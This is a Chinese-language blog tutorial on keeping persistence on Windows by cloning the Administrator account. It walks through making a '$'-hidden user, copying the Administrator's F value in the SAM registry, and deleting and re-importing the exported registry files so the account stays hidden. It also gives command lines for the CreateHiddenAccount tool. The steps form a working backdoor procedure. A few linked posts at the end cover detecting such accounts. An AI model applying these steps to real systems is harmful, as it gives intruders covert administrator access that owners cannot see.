操作系统权限维持(二)之Windows系统-克隆账号维持后门

已于 2023-07-13 09:07:23 修改
阅读量1.1k 收藏 6
点赞数 3
分类专栏: 操作系统权限维持 文章标签: windows 安全 网络安全 网络
于 2023-03-25 11:38:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129763870
版权
系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门

克隆账号维持后门

隐藏账户

隐藏账户,顾名思义就是计算机上看不到的用户在一个用户名后面添加 符号,如( h a c k 符号,如(hack 符号,如(hack)达到简单的隐藏用户目的,从而进行简单的权限维持

添加hack$用户,用net user命令是查询不到的

net user hack$ 123456 /add
net user

在这里插入图片描述
但是 net localgroup administrators 、用户管理、用户登录界面可以查看到

在这里插入图片描述在这里插入图片描述

使用克隆账户创建后门

1、 添加隐藏账号:

net user hack$ Admin@123 /add

在这里插入图片描述

2、在注册表操作进行用户隐藏:

打开注册表

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\

在这里插入图片描述

导出之前创建的hack$用户注册表文件

在这里插入图片描述

导出成为一个注册表文件,这里导出保存为hack.reg

在这里插入图片描述

我们可以从这里看到Administrator的类型是0X1f4,在用户Users的目录下找到相同的数字打开

在这里插入图片描述
在这里插入图片描述
复制Administrator 中的F键值

在这里插入图片描述

找到hack$账户所对应的类型,在Users目录下找到相同的对应的文件这里是0x3f6,那我们就去Users找到000003F6

在这里插入图片描述在这里插入图片描述

将Administrator账户所复制的值,粘贴到hack$对应的F值中

在这里插入图片描述

将hack$ 账户类型所对应的数据导出来

在这里插入图片描述
在这里插入图片描述
这里我们导出保存为hack2.reg

在这里插入图片描述

然后我们再去删除隐藏账户hack$

net user hack$ /del

在这里插入图片描述

此时我们打开计算机管理是看看不到hack$用户的

在这里插入图片描述

在注册表中也同样看不到

在这里插入图片描述

现在我们去执行我们刚刚导出的两个注册表文件,这里直接点击我们导出的注册表文件就好了

在这里插入图片描述

在这里插入图片描述

这时我们会发现注册表中重新出现了hack$这个用户

在这里插入图片描述

但是在用户管理的页面是看不到的

在这里插入图片描述

此时我们就可以对hack$账户进行远程连接,如果目标administrator账号在线则会被挤出

创建隐藏账号的工具介绍

该工具可以使用于创建隐藏账户

工具下载地址:https://github.com/wgpsec/CreateHiddenAccount

在这里插入图片描述

参数描述
-c 检查当前系统的隐藏账户
-d 指定要删除的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $
-p 指定添加的用户的密码 
-u 指定要添加的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $

工具使用

例如这里添加一个用户名为 test 的隐藏账号,工具会自动在用户名后添加 $ 符,因此创建后的用户名为 test$(使用的时候,记得在管理员权限下运行,不然会提示权限不足)

CreateHiddenAccount_upx_v0.2.exe -u test -p Admin123

在这里插入图片描述

创建完后,通过 net user 和控制面板等等都是看不到这个账号的

在这里插入图片描述

在这里插入图片描述

检查当前系统的隐藏账号

CreateHiddenAccount_upx_v0.2.exe -c

在这里插入图片描述

删除test 隐藏账号,当删除完账号后,再次检查当前系统的隐藏账号,可以看到就提示没有隐藏账号了

CreateHiddenAccount_upx_v0.2.exe -d test

在这里插入图片描述

怰月
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
应急响应 - Windows用户分析,Windows隐藏账号分析,Windows克隆账号分析
Karka_的博客
09-06 604
攻击者通常会在服务器中创建用户进行维权,查看是否有新增的可疑账号,核实后禁用或删除。
Windows操作系统隐藏克隆账户
weixin_48824655的博客
07-17 371
Windows操作系统隐藏克隆账户
应急响应 - Windows用户分析,Windows隐藏账号分析,Windows克隆账号分析_怎么发现windows账户克隆(1)
最新发布
2401_84254418的博客
04-29 1034
【控制面板】-【用户账户】-【用户账户】-【管理用户账户】中,可以看到系统中有哪些用户。net user administrator,可以查看用户的信息,比如上次登录时间。query user,可以查看当前登录的用户。
创建隐藏用户和克隆用户
h1825819493的博客
04-16 441
作用:我们在cmd中进行账户创建,在用户名后面加上$符之后,我们使用net user进行本机所有账户查看的时候是看不到加$的账户(net user //查看本机所有用户的命令)。此时,普通用户的账户是禁用状态,且他的用户组仍然属于普通用户的users组,但是他拥有管理员权限。步骤:创建账户->导出账户注册表->删除账户->导入账户注册表->登录账户 [需要不显示最终用户名]步骤:创建账户->根据账户的administrator注册表F键值替换掉原先创建的账户的F键值->启用账户
权限维持】Linux&OpenSSH&PAM后门&SSH软链接&公私钥登录
今天是几号的博客
04-16 1553
可以找到以读写方式记录在文件中的SSH后门密码文件的位置,并通过该方法判断是否存在SSH后门。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持。4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即使用万能密码登陆,将用户名密码记录到文件中。
操作系统权限维持(一)之Windows系统-粘贴键后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-23 579
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。Web入侵流程。
PXE引导再生龙安装Windows操作系统
03-23
简化操作系统安装 PXE 再生龙 Windows操作系统安装
Windows 系统备份克隆工具 Acronis True Image 2020 Build 25700.zip
06-02
Acronis True Image 2020 界面更加直观,操作更加方便,使用它可以轻松对操作系统中的数据、磁盘中的数据以及移动存储设备中的数据进行备份、克隆以及还原等操作,这个版本可以完美兼容 Windows 10 操作系统,并自带...
电脑操作系统GHOST若干台全自动网络克隆工具
05-18
理论上说只要能够用GHO安装系统的电脑都可以用。里面有本人提供的笔记,保证能用。建议用千兆交换机连对等网,电脑设置为网络启动,支持MBR分区。不管是笔记本和台式机都可以,最多同时试过16台电脑,主要是会议桌摆...
electron开发桌面程序windows+mac操作系统安装,集成前端react+ant design UI
11-03
在电子(Electron)框架下开发桌面应用程序,可以利用Web技术如HTML、CSS和JavaScript,同时支持Windows和macOS操作系统。本教程将详细介绍如何在这些平台上安装和配置Electron环境,以及如何集成React和Ant Design ...
hp-unix操作系统克隆
04-22
在HP-UX操作系统环境中,克隆是维护系统稳定性和快速恢复的一种重要手段。它允许管理员创建一个完全相同的系统副本,以便在需要时迅速部署或恢复系统。本文将深入探讨使用`drd`(Disk Replication Director)命令...
MySQL 8.0 新特性之 Clone Plugin
douluo998的博客
04-18 1179
个人感觉,主要还是为 Group Replication 服务。在 Group Replication 中,如果要添加一个新的节点,这个节点差异数据的补齐是通过分布式恢复( Distributed Recovery )来实现的。在 MySQL 8.0.17 之前,只支持一种恢复方式,即 Binlog。如果新节点需要的 Binlog 在集群中不存在,这个时候,就只能借助于备份工具先做个全量数据的备份恢复,然后再通过分布式恢复同步增量数据。
克隆账户問題
weixin_34146410的博客
06-16 336
方法一、经常看到一些人在***一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似 乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些 过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 首先要让大家知道的概念是在Windows 2000和Windows NT里...
Windows下创建隐藏账户、影子账户
m0_46607055的博客
01-25 3525
方法一: 用户名后面加$符号 net user test$ password /add net localgroup administrators test$ /add 此时使用命令net user 查看不到此用户,但使用 wmic命令可以 wmic useraccount get Name 此外,在控制面板也能看到此用户 可直接用命令删除 net user test$ /del 对于此方法,微软官方的回答是 方法:修改注册表 前提是...
windows账号克隆
往事流年的博客
10-27 4457
首先创建几个用户,其中包含普通用户(为了显现普通用户和隐藏用户的区别),再创建一个隐藏用户 打开DOS命令运行框,输入regedit命令进入到注册表,找到注册表下面的SAM文件夹,如果打不开请要修改administrator的权限,修改权限为完全控制然后打开SAM文件找到每个用户对应的带有注册信息的文件 打开管理员的注册信息文件并复制该文件中的F值 打开隐藏用户对应的注册文件,将...
windows克隆账户
Kyl2n的博客
01-09 1255
** 创建隐藏账户 ** 一、 在命令行下隐藏的账户 当在命令行中创建账户时,若在用户名后加上“$”,则该账户用“net user”命令无法查看到 、 在计算机管理中隐藏的账户 用上述方法在命令行中创建的账户虽然做到了在命令行下的隐藏,但在“计算机管理”中依然可以看到该账户的存在 我们可以对注册表进行相应处理以达到在“计算机管理”中隐藏账户的目的。在注册表下分别将“abc”项及与其相应的“0...
克隆管理员帐号的方法
十年磨一剑,霜刃未曾试!
07-31 4411
经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是
【末世旅行之渗透测试】Windows创建隐藏克隆用户
末世旅行
10-15 861
Windows创建隐藏克隆账号,隐藏克隆用户,就是隐藏的,克隆administrator的用户
windows创建隐藏用户和克隆管理员用户
热门推荐
Au
02-02 1万+
账号克隆就是复制管理员的注册表信息 搭建环境     虚拟机是windows server 2008,开3389,查看ip地址进行远程登录   登录后查看用户 创建一个用户  $ 可以使该用户在命令行中隐藏,本文为演示实现创建隐藏账号,可直接修改guest等默认用户进行克隆实现隐藏后门   我们再次查看用户,发现并没有 au$ 这个用户,但是在用户管理中可以发现 ...
通过IPXE无线安装操作系统PPT
11-13
这些工具通常通过克隆磁盘或镜像恢复来快速部署操作系统。 通过IPXE无线安装操作系统为用户提供了新的可能性,尤其是对于远程部署和大规模部署场景,它可以节省时间,减少物理媒介的依赖,并提高安装效率。同时,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值